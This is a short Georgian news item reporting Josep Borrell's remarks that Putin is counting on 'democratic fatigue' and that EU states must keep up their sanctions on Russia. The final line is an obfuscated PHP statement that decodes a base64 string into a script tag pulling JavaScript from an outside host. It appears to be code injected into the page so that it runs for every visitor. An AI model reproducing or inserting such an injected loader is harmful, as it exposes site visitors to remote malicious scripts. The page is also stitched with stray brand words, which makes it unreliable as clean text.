celsiusi
ავერსი საქკაბელი

ევროპულმა საზოგადოებამ არ უნდა მისცეს საკუთარ თავს დაღლილობის უფლება, რადგან პუტინს დემოკრატიული დაღლილობის იმედი აქვს, – ამის შესახებ საგარეო პოლიტიკისა და უსაფრთხოების საკითხებში ევროკავშირის უმაღლესმა წარმომადგენელმა, ჟოზეფ ბორელმა ევროკავშირის მინისტერიალის დასრულების შემდეგ გამართულ პრესკონფერენციაზე განაცხადა.

ბორელის თქმით, ევროკავშირის ქვეყნებმა რუსეთის ეკონომიკის წინააღმდეგ სანქციების დააწესეს და უნდა შეასრულონ ეს გადაწყვეტილება.

„მე დარწმუნებული ვარ, რომ პუტინს დემოკრატიული დაღლილობის იმედი აქვს. მას სჯერა, რომ დემოკრატიები სუსტია და შემდეგ ერთი ამბავი იფარება სხვა ამბებით. არა, ევროპულ საზოგადოებას არ შეუძლია, მისცეს საკუთარ თავს დაღლილობის უფლება. ევროპულმა საზოგადოებამ და ევროკავშირის წევრი სახელმწიფოების მთავრობებმა უნდა გააგრძელონ მათ მიერ მიღებული გადაწყვეტილებების მხარდაჭერა. მათ მიიღეს რუსეთის ეკონომიკის წინააღმდეგ შემზღუდავი ზომების დაწესების გადაწყვეტილებები და უნდა შეასრულონ ისინი. მათ უნდა გააგრძელონ რუსეთის ეკონომიკაზე ზეწოლა და ამავე დროს, გააცნობიერონ, რომ სასწაულებრივი დარეგულირება არ იქნება, თუმცა ჩვენ უნდა გავაკეთოთ ეს ზუსტად იმ დონეზე, რა დონეზეც ჩვენ მხარს ვუჭერთ უკრაინას სამხედრო კუთხით“, – განაცხადა ჟოზეფ ბორელმა.

526
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");